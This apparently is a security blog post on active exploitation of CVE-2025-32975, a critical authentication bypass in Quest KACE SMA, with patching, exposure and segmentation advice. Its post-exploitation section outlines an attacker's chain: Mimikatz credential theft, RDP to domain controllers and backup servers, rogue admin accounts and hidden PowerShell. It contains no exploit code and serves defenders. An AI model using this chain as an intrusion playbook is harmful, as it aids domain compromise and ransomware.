The research for this article draws on Arctic Wolf’s incident report, the Seralys security advisory, and Quest’s own patching bulletin.
What’s New This Week
Arctic Wolf published confirmed incident data on 19 March 2026 showing attackers who gained initial access via CVE-2025-32975 subsequently achieved domain controller access and reached backup infrastructure including Veeam and Veritas systems. The attack chain is more complete than initial reports suggested, and the targeting of backup systems is a significant escalation indicator.
Changelog
| Date | Summary |
|---|---|
| 23 Mar 2026 | Initial publication. |
CVE-2025-32975 is being actively exploited right now. The patch has been available since May 2025. That ten-month gap is the whole story.
Quest KACE Systems Management Appliance is enterprise infrastructure. If you work in a mid-to-large organisation with Windows endpoints, there is a reasonable chance KACE or something very like it is managing those machines. It handles software deployment, patch management, endpoint inventory, and remote monitoring. Agents run on every managed machine, phoning home to the central appliance. The SMA is the hub. Every endpoint is a spoke.
The Vulnerability
CVE-2025-32975 is an authentication bypass in the SSO authentication handling mechanism. Classified under CWE-287 (Improper Authentication), it allows an unauthenticated attacker to impersonate a legitimate user without valid credentials. The flaw does not require prior access, does not require user interaction, and is exploitable over the network. Hence the CVSS score of 10.0 – the maximum possible.
CVSS 10.0 is not common. It requires all the worst conditions to align simultaneously: network-accessible, no authentication required, no user interaction, no complexity, full compromise of confidentiality, integrity, and availability. There are no partial marks here. Researchers at Seralys discovered the vulnerability and disclosed it in June 2025, by which point Quest had already shipped a fix.
Affected versions span the 13.x and 14.x branches:
- 13.0.x before 13.0.385
- 13.1.x before 13.1.81
- 13.2.x before 13.2.183
- 14.0.x before 14.0.341 (Patch 5)
- 14.1.x before 14.1.101 (Patch 4)
The fix has been available since May 2025. Organisations that applied it are not vulnerable. Organisations that did not are exposed.
Why CVSS 10.0 Is Different
Most exploited vulnerabilities require something from the attacker – a phished credential, an authenticated session, adjacent network access, a specific software configuration. CVSS 10.0 means none of that applies. An attacker with internet access to the appliance can begin exploiting it immediately.
The practical implication is that internet-facing KACE SMA instances are trivially compromised. You do not need nation-state capabilities. You need a network scanner and the exploit.
Arctic Wolf’s telemetry shows exploitation activity beginning the week of March 9, 2026, targeting KACE SMA instances publicly exposed to the internet. The security firm noted at the time of its report that no public proof-of-concept had been identified, which suggests the actors exploiting this are either working from private research or from knowledge of the vulnerability class. Given the disclosure timeline – the vulnerability was publicly documented in June 2025 – that window for independent rediscovery is substantial.
The Management Plane Problem
Here is the part that should concern security teams more than the CVSS score.
KACE SMA is not a productivity tool. It is an administrative control plane. Compromising it does not give an attacker access to one machine. It gives them the ability to push software and commands to every machine the appliance manages.
Arctic Wolf’s incident data makes this concrete. Observed post-exploitation activity included:
- Remote command execution via KACE’s KPluginRunProcess functionality
- Credential harvesting using Mimikatz (in one case disguised as asd.exe)
- Enumeration of domain administrators, domain controllers, and logged-in users
- RDP access to domain controllers
- RDP access to backup infrastructure: Veeam and Veritas systems
- Creation of additional administrative accounts with domain admin privileges
- PowerShell execution with -ExecutionPolicy Bypass and -WindowStyle Hidden flags
The attacker did not stop at KACE. They walked from the management appliance to the domain controllers and then to the backup systems. Backup systems are the recovery safety net. Reaching them is how ransomware attacks become catastrophic rather than merely bad.
This is the management plane pattern. Security teams spend substantial effort hardening endpoints: EDR coverage, application whitelisting, logging pipelines, vulnerability scanning. That investment is sound. But the tool that manages all those endpoints – the one with agents on every machine, with administrative credentials cached in its database, with the ability to push arbitrary scripts to the entire estate – often receives less attention. It is infrastructure. It is boring. It does not make the threat model presentations.
KACE had a patch available for ten months. Organisations that were exploited in March 2026 were running unpatched versions of management software that was internet-facing. That combination should not have been possible.
What to Do
Patch immediately. The fixed versions are documented above. Quest extended patches to versions as far back as 13.0.383, covering three prior major versions beyond their standard support window. If your KACE SMA is in any affected branch, update it.
Remove internet exposure. KACE SMA should not be directly accessible from the public internet. If remote access is required, route it through a VPN. A management appliance with a public IP and no effective authentication – which is the practical state of a CVSS 10.0 auth bypass – is not a defensible configuration.
Audit for indicators of compromise. If you are running an affected version and it has been internet-accessible, assume potential compromise and investigate. Look for: unexpected administrative accounts, unusual PowerShell execution (particularly with bypass flags), Base64-encoded payloads in KACE logs, outbound connections to unfamiliar infrastructure, and unexpected RDP sessions to domain controllers or backup systems.
Segment the management plane. Even after patching, the management network should not be flat. KACE, SCCM, Intune connectors, SIEM forwarders, RMM agents – none of these should have unrestricted lateral movement paths to production systems. Network segmentation is not just about limiting blast radius when an endpoint is compromised. It is about limiting blast radius when the management tool is compromised.
The Broader Pattern
Management tooling is a category that consistently underweights patching urgency relative to its actual risk profile.
The argument usually goes: “We cannot patch KACE right now – it manages our entire estate, and if something goes wrong with the update we will have a worse problem than the CVE.” That reasoning inverts the risk. An unpatched management appliance with a CVSS 10.0 auth bypass that is internet-facing is not a theoretical risk. It is an active exploit target. The update risk is recoverable. A domain-wide compromise with backup infrastructure in attacker hands may not be.
The same logic applies across the category. SCCM, ConnectWise, Kaseya, Datto, SolarWinds – management and monitoring tools have historically been high-value targets precisely because they combine wide access, high trust, and lower-than-average patch velocity. Attackers have understood this for years. Security teams need to weight management plane patching at least as highly as endpoint patching, not below it.
One server. Every machine it manages. That is the leverage. CVE-2025-32975 is not the last time this pattern will be exploited.